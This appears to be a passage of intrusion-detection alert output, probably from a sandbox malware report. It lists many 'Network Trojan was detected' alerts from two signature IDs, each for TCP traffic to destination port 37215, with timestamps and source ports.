          Timestamp:05/28/24-14:47:34.625669
          SID:2829579
          Source Port:52276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201372
          SID:2835222
          Source Port:42854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613738
          SID:2829579
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953234
          SID:2835222
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465135
          SID:2829579
          Source Port:40970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466316
          SID:2835222
          Source Port:49732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205561
          SID:2829579
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234675
          SID:2835222
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067282
          SID:2829579
          Source Port:60578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849146
          SID:2835222
          Source Port:57188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321130
          SID:2835222
          Source Port:56144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849286
          SID:2835222
          Source Port:34642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938435
          SID:2835222
          Source Port:55170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281734
          SID:2829579
          Source Port:45974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599619
          SID:2835222
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163805
          SID:2835222
          Source Port:49510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878329
          SID:2829579
          Source Port:44880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482988
          SID:2835222
          Source Port:33876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328014
          SID:2829579
          Source Port:41542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846341
          SID:2835222
          Source Port:48168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240501
          SID:2835222
          Source Port:47260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760407
          SID:2829579
          Source Port:44150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123801
          SID:2829579
          Source Port:60380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778789
          SID:2829579
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232970
          SID:2835222
          Source Port:54026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552134
          SID:2829579
          Source Port:52466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605113
          SID:2829579
          Source Port:48024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189068
          SID:2829579
          Source Port:48750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472329
          SID:2829579
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796932
          SID:2835222
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359276
          SID:2835222
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187241
          SID:2829579
          Source Port:34356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186040
          SID:2829579
          Source Port:58558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561068
          SID:2835222
          Source Port:34868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.335458
          SID:2829579
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940943
          SID:2835222
          Source Port:38012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593293
          SID:2835222
          Source Port:44054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962864
          SID:2829579
          Source Port:45936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064215
          SID:2829579
          Source Port:58418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926602
          SID:2835222
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811304
          SID:2835222
          Source Port:37578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483145
          SID:2829579
          Source Port:46312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760301
          SID:2829579
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474551
          SID:2835222
          Source Port:60796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562525
          SID:2835222
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669972
          SID:2829579
          Source Port:44880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189054
          SID:2829579
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634144
          SID:2829579
          Source Port:41530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142789
          SID:2835222
          Source Port:41240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045872
          SID:2835222
          Source Port:40876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293720
          SID:2829579
          Source Port:46880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668997
          SID:2835222
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.037211
          SID:2829579
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299586
          SID:2835222
          Source Port:38374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605231
          SID:2829579
          Source Port:34072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181219
          SID:2829579
          Source Port:55398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.091585
          SID:2829579
          Source Port:35792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984996
          SID:2829579
          Source Port:37394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602066
          SID:2835222
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178894
          SID:2829579
          Source Port:59790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117037
          SID:2829579
          Source Port:56414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562192
          SID:2835222
          Source Port:52280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544809
          SID:2829579
          Source Port:42210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475621
          SID:2835222
          Source Port:44734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943240
          SID:2835222
          Source Port:43566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301374
          SID:2829579
          Source Port:38638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278139
          SID:2835222
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114472
          SID:2829579
          Source Port:43774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551181
          SID:2829579
          Source Port:55952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298772
          SID:2835222
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222480
          SID:2829579
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208414
          SID:2829579
          Source Port:57970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989661
          SID:2829579
          Source Port:37646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592932
          SID:2835222
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.607162
          SID:2829579
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402255
          SID:2835222
          Source Port:46476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324905
          SID:2829579
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879109
          SID:2835222
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756008
          SID:2835222
          Source Port:52654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300887
          SID:2835222
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063225
          SID:2829579
          Source Port:45406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187368
          SID:2835222
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973212
          SID:2835222
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336534
          SID:2835222
          Source Port:38096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214838
          SID:2835222
          Source Port:53876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186971
          SID:2829579
          Source Port:53620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545891
          SID:2829579
          Source Port:46418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847690
          SID:2835222
          Source Port:35316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126823
          SID:2829579
          Source Port:41346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745843
          SID:2829579
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922681
          SID:2835222
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982880
          SID:2829579
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486544
          SID:2829579
          Source Port:49270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817998
          SID:2835222
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339736
          SID:2835222
          Source Port:54886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357084
          SID:2835222
          Source Port:58628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225188
          SID:2835222
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329005
          SID:2829579
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.094238
          SID:2835222
          Source Port:48254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240621
          SID:2835222
          Source Port:49488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116941
          SID:2835222
          Source Port:39158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271151
          SID:2835222
          Source Port:36174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850771
          SID:2835222
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.918883
          SID:2835222
          Source Port:48318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338320
          SID:2829579
          Source Port:54086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265812
          SID:2829579
          Source Port:59620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183836
          SID:2829579
          Source Port:39174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817609
          SID:2829579
          Source Port:36944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845829
          SID:2829579
          Source Port:42424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930931
          SID:2835222
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160505
          SID:2835222
          Source Port:42902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811791
          SID:2835222
          Source Port:50090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810402
          SID:2835222
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714495
          SID:2829579
          Source Port:60440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302219
          SID:2829579
          Source Port:57064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156246
          SID:2829579
          Source Port:32884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923500
          SID:2829579
          Source Port:38720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625765
          SID:2829579
          Source Port:41002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946688
          SID:2829579
          Source Port:40668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187271
          SID:2829579
          Source Port:44044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237487
          SID:2835222
          Source Port:35516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708978
          SID:2835222
          Source Port:49340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093789
          SID:2829579
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845466
          SID:2829579
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156732
          SID:2835222
          Source Port:35280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932942
          SID:2835222
          Source Port:56400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399704
          SID:2829579
          Source Port:56030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269685
          SID:2829579
          Source Port:50866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923089
          SID:2829579
          Source Port:36720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609909
          SID:2835222
          Source Port:49562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225915
          SID:2829579
          Source Port:39512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725101
          SID:2829579
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793560
          SID:2835222
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627103
          SID:2835222
          Source Port:37966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780330
          SID:2835222
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067716
          SID:2829579
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478122
          SID:2835222
          Source Port:37424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168193
          SID:2835222
          Source Port:40802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.509541
          SID:2829579
          Source Port:42328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214129
          SID:2829579
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214289
          SID:2835222
          Source Port:41434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225875
          SID:2829579
          Source Port:40282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548588
          SID:2829579
          Source Port:35686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062184
          SID:2829579
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764638
          SID:2835222
          Source Port:60606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671753
          SID:2835222
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326339
          SID:2829579
          Source Port:37596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922483
          SID:2835222
          Source Port:44938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411802
          SID:2835222
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276309
          SID:2829579
          Source Port:48062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745941
          SID:2835222
          Source Port:35564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492666
          SID:2829579
          Source Port:40866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878646
          SID:2835222
          Source Port:34362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741636
          SID:2829579
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978241
          SID:2835222
          Source Port:51606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537526
          SID:2829579
          Source Port:55330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150771
          SID:2829579
          Source Port:38800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698503
          SID:2829579
          Source Port:48582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298351
          SID:2829579
          Source Port:33346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182560
          SID:2829579
          Source Port:35588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190695
          SID:2829579
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772153
          SID:2835222
          Source Port:41808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336958
          SID:2835222
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338550
          SID:2835222
          Source Port:40866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958521
          SID:2835222
          Source Port:47490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272342
          SID:2835222
          Source Port:51262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667681
          SID:2829579
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480466
          SID:2835222
          Source Port:34360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328633
          SID:2829579
          Source Port:44278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838503
          SID:2829579
          Source Port:39284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204823
          SID:2829579
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329067
          SID:2829579
          Source Port:33108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946828
          SID:2829579
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044238
          SID:2835222
          Source Port:39666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223168
          SID:2829579
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760138
          SID:2835222
          Source Port:33548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235672
          SID:2829579
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299989
          SID:2829579
          Source Port:47074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336933
          SID:2829579
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243214
          SID:2835222
          Source Port:55072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711076
          SID:2829579
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627716
          SID:2829579
          Source Port:47592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597233
          SID:2835222
          Source Port:51572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530227
          SID:2829579
          Source Port:58642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401574
          SID:2835222
          Source Port:50766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742309
          SID:2829579
          Source Port:52176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224868
          SID:2835222
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471201
          SID:2829579
          Source Port:47932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594488
          SID:2835222
          Source Port:57114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473736
          SID:2829579
          Source Port:46088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983442
          SID:2829579
          Source Port:52520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848322
          SID:2829579
          Source Port:46320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781088
          SID:2829579
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371449
          SID:2829579
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075716
          SID:2835222
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290236
          SID:2835222
          Source Port:58370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963779
          SID:2835222
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316884
